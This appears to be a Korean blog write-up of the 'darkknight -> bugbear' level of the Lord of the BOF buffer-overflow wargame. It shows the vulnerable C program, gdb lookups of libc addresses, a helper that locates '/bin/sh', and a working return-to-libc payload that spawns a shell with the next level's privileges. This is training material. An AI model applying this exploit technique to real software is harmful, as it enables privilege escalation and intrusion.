ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • [lob] darkknight -> bugbrear
    공부/LOB 2014. 7. 30. 20:06

    [darkknight@localhost darkknight]$ cat bugbear.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - bugbear
            - RTL1
    */

    #include <stdio.h>
    #include <stdlib.h>

    main(int argc, char *argv[])
    {
        char buffer[40];
        int i;

        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }

        if(argv[1][47] == '\xbf')
        {
            printf("stack betrayed you!!\n");
            exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
    }

    (gdb) b main
    Breakpoint 1 at 0x8048436
    (gdb) r
    Starting program: /home/darkknight/bb

    Breakpoint 1, 0x8048436 in main ()
    (gdb) p system
    $1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
    (gdb)

    [darkknight@localhost darkknight]$ cat find.c
    int main(int argc, char * argv[])
    {
        long shell;
        shell = 0x40058ae0;
        while(memcmp((void *)shell, "/bin/sh", 8)) shell++;
        printf("/bin/sh = %p\n",shell);
    }   
    [darkknight@localhost darkknight]$ ./find
    /bin/sh = 0x400fbff9

    payload = 더미 44 byte + system주소 + 더미 4byte + /bin/sh 주소

    [darkknight@localhost darkknight]$ ./bugbear `python -c 'print "a"*44+"\xe0\x8a\x05\x40"+"BBBB"+"\xf9\xbf\x0f\x40"'`
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?@BBBB廈@
    bash$ Xshell
    sh: Xshell: command not found
    bash$ id
    uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)
    bash$ my-pass
    euid = 513
    new divide

    '공부 > LOB' 카테고리의 다른 글

    [lob] giant -> assassin  (0) 2014.07.30
    [lob] bugbear -> giant  (0) 2014.07.30
    [lob] darkknight -> bugbrear  (0) 2014.07.30
    [lob] golem -> darknight  (0) 2014.07.30
    [lob] vampire -> skeleton  (3) 2014.07.30
    [lob] troll -> vampire  (0) 2014.07.30

    댓글 0

Designed by Tistory.